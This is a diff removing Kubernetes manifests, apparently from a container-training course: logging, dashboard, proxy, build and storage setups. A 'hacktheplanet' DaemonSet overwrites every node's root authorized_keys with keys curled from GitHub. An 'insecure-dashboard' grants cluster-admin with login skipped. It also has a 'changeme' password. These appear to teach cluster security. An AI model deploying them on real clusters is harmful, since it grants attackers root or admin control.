resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
@@ -1,167 +0,0 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
@@ -1,14 +0,0 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
@@ -1,34 +0,0 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
@@ -1,18 +0,0 @@
|
||||
global
|
||||
daemon
|
||||
maxconn 256
|
||||
|
||||
defaults
|
||||
mode tcp
|
||||
timeout connect 5000ms
|
||||
timeout client 50000ms
|
||||
timeout server 50000ms
|
||||
|
||||
frontend the-frontend
|
||||
bind *:80
|
||||
default_backend the-backend
|
||||
|
||||
backend the-backend
|
||||
server google.com-80 google.com:80 maxconn 32 check
|
||||
server ibm.fr-80 ibm.fr:80 maxconn 32 check
|
||||
|
||||
@@ -1,16 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: haproxy
|
||||
spec:
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
name: haproxy
|
||||
containers:
|
||||
- name: haproxy
|
||||
image: haproxy:1
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /usr/local/etc/haproxy/
|
||||
|
||||
@@ -1,13 +0,0 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 1234
|
||||
@@ -1,360 +0,0 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0-rc2
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
- --enable-skip-login
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.2
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
|
||||
---
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: insecure-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
@@ -1,10 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: hello
|
||||
namespace: default
|
||||
spec:
|
||||
containers:
|
||||
- name: hello
|
||||
image: nginx
|
||||
|
||||
@@ -1,29 +0,0 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: kaniko-build
|
||||
spec:
|
||||
initContainers:
|
||||
- name: git-clone
|
||||
image: alpine
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
git clone git://github.com/jpetazzo/container.training /workspace
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
containers:
|
||||
- name: build-image
|
||||
image: gcr.io/kaniko-project/executor:latest
|
||||
args:
|
||||
- "--context=/workspace/dockercoins/rng"
|
||||
- "--insecure"
|
||||
- "--destination=registry:5000/rng-kaniko:latest"
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
volumes:
|
||||
- name: workspace
|
||||
|
||||
@@ -1,162 +0,0 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
@@ -1,110 +0,0 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
namespace: local-path-storage
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes", "persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints", "persistentvolumes", "pods"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
namespace: local-path-storage
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.8
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
@@ -1,138 +0,0 @@
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: system:aggregated-metrics-reader
|
||||
labels:
|
||||
